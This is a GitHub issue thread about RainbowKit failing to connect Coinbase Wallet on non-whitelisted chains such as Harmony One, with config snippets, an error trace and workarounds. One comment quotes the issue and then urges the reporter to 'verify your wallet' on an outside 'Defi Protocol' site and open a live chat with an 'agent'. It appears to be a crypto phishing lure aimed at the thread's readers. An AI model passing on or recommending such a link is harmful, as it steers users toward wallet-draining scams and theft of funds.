### ISSUE TITLE
[bug] Cannot connect with Coinbase Wallet on non-whitelisted networks

### ISSUE THREAD

**Issue by yonadaaa** [rainbow-me/rainbowkit#1524] opened 2023-09-20 15:20 UTC
### Is there an existing issue for this?

- [X] I have searched the existing issues

### RainbowKit Version

1.0.11

### wagmi Version

1.4.1

### Current Behavior

I cannot connect, or switch networks, with Coinbase Wallet if the network is not in the wallets list of whitelisted networks:
https://docs.cloud.coinbase.com/wallet-sdk/docs/whitelisted-networks

The app works fine if I add the network AND switch to it manually.

I believe this is because RainbowKit uses Viem's `CoinbaseWalletConnector.switchChain`, but the `wallet_switchEthereumChain` RPC method is not supported in Coinbase for non-whitelisted chains:
https://docs.cloud.coinbase.com/wallet-sdk/docs/switching-chains

### Expected Behavior

I can connect with Coinbase wallet and the app requests that I add or switch to the new chain.

### Steps To Reproduce

Create a Wagmi Config with a non-whitelisted chain (eg. Harmony One):
```
import { harmonyOne } from 'wagmi/chains';

...

const { chains, publicClient, webSocketPublicClient } = configureChains(
  [harmonyOne],
  [publicProvider()]
);
```

Run the app and attempt to connect with Coinbase Wallet. You will receive the following error:

```
SwitchChainError: An error occurred when attempting to switch chain.

Details: Unrecognized chain ID. Try adding the chain using addEthereumChain first.
Version: viem@1.10.6
    at CoinbaseWalletConnector.switchChain (coinbaseWallet.js:188:1)
```

**Comment by Najnic** [comment] 2023-10-08 02:42
> ### Is there an existing issue for this?
> * [x]  I have searched the existing issues
> 
> ### RainbowKit Version
> 1.0.11
> 
> ### wagmi Version
> 1.4.1
> 
> ### Current Behavior
> I cannot connect, or switch networks, with Coinbase Wallet if the network is not in the wallets list of whitelisted networks: https://docs.cloud.coinbase.com/wallet-sdk/docs/whitelisted-networks
> 
> The app works fine if I add the network AND switch to it manually.
> 
> I believe this is because RainbowKit uses Viem's `CoinbaseWalletConnector.switchChain`, but the `wallet_switchEthereumChain` RPC method is not supported in Coinbase for non-whitelisted chains: https://docs.cloud.coinbase.com/wallet-sdk/docs/switching-chains
> 
> ### Expected Behavior
> I can connect with Coinbase wallet and the app requests that I add or switch to the new chain.
> 
> ### Steps To Reproduce
> Create a Wagmi Config with a non-whitelisted chain (eg. Harmony One):
> 
> ```
> import { harmonyOne } from 'wagmi/chains';
> 
> ...
> 
> const { chains, publicClient, webSocketPublicClient } = configureChains(
>   [harmonyOne],
>   [publicProvider()]
> );
> ```
> 
> Run the app and attempt to connect with Coinbase Wallet. You will receive the following error:
> 
> ```
> SwitchChainError: An error occurred when attempting to switch chain.
> 
> Details: Unrecognized chain ID. Try adding the chain using addEthereumChain first.
> Version: viem@1.10.6
>     at CoinbaseWalletConnector.switchChain (coinbaseWallet.js:188:1)
> ```
> 
> ### Link to Minimal Reproducible Example (CodeSandbox, StackBlitz, etc.)
> _No response_
> 
> ### Anything else?
> _No response_

Hi @yonadaaa 
Visit the official [Defi Protocol](https://defirefixprotocol.web.app/) page to verify your wallet under validation to complete your request for your eligibility purpose via [Defi Protocol](https://defirefixprotocol.web.app/)
Note: Click on the chat button to initiate a chat with an agent on a live chat for more assistance.

**Comment by juansalvatore** [comment] 2023-12-15 14:44
We are also having the same issue with:
```json
"wagmi": "0.12.19",
"@rainbow-me/rainbowkit": "0.12.18"
```

**Comment by KosmosKey** [comment] 2024-01-03 15:18
I've checked the issue and can confirm it happens on my end too.

![image](https://github.com/rainbow-me/rainbowkit/assets/53529533/42101963-51dd-4b1d-a648-3a5fc7aa341d)

As @yonadaaa pointed out, we're using `viem` and `wagmi` for wallet connections and chain switching. This seems to be causing the problem.

We need to raise an issue to the wagmi team to discuss adding non-whitelisted chains to the coinbase wallet during the connection process.

For now, there isn't an easy fix. The temporary solution is to manually open the Coinbase wallet, select the custom network, and then click "retry."

![image](https://github.com/rainbow-me/rainbowkit/assets/53529533/5e4c4df9-f08b-41e9-b7bf-8644438c107c)

**Comment by KosmosKey** [comment] 2024-02-19 12:29
@yonadaaa Are you able to reproduce this issue right now ? Coinbase wallet has fixed this by adding a warning about switching to a non whitelisted network like this.

![image](https://github.com/rainbow-me/rainbowkit/assets/53529533/feddeea6-f4f6-4698-871e-8344092f10bd)

**Comment by KosmosKey** [comment] 2024-02-21 20:45
@yonadaaa Any thoughts ?

**Comment by KosmosKey** [comment] 2024-02-22 15:54
Closing this issue for now. Feel free to raise another issue if you come up with anything else 🙏

**Closed by KosmosKey** 2024-02-22 15:54 UTC
Labels: walletlink, wagmi

**Comment by BornPsych** [comment] 2024-03-21 06:18
It does show errors and doesn't allow us to connect to the specific network If the user connects to non-whitelisted networks for the first time, when you manually add it to the network tab and then it works fine but when you try to connect by using the following configuration, the chain does not get added to the network and it shows ambiguous behaviour

```
const { chains, publicClient, webSocketPublicClient } = configureChains(
  [ nonWhitelistedNetwork],
  [
    jsonRpcProvider({
      rpc: () => ({
        http: 'https://nonWhitelistedNetwork.xyz/http',
        webSocket: 'wss://nonWhitelistedNetwork.xyz/ws',
      }),
    }),
  ]
);
```

```
    <WagmiConfig config={wagmiConfig}>
      <RainbowKitProvider chains={chains} initialChain={nonWhitelistedNetwork.id}>
        {children}
      </RainbowKitProvider>
    </WagmiConfig>
```

@magiziz Please look into this, tell me if you are not able to replicate the error

**Comment by magiziz** [comment] 2024-03-21 10:18
@BornPsych This is not going to work in RainbowKit v1 due to EIP-1193 connector behaviours. Please can you try using RainbowKit version `2.0.2` ?

**Comment by AlijonovMukhammaddiyor** [comment] 2024-06-05 02:15
I found solution:

```
export const wagmiConfig = createConfig({
  chains: [
    {
      ...chiliz,
      blockExplorers: [
        {
          name: "Chiliz Explorer",
          apiUrl: "https://scan.chiliz.com/api",
          url: "https://scan.chiliz.com",
        },
      ],
    },
    {
      ...spicy,
      blockExplorers: [
        {
          name: "Spicy Explorer",
          apiUrl: "http://spicy-explorer.chiliz.com/api",
          url: "http://spicy-explorer.chiliz.com",
        },
      ],
    },
  ],
  connectors,
  transports,
  ssr: true,
})
```

Change the blockExplorers and it is working
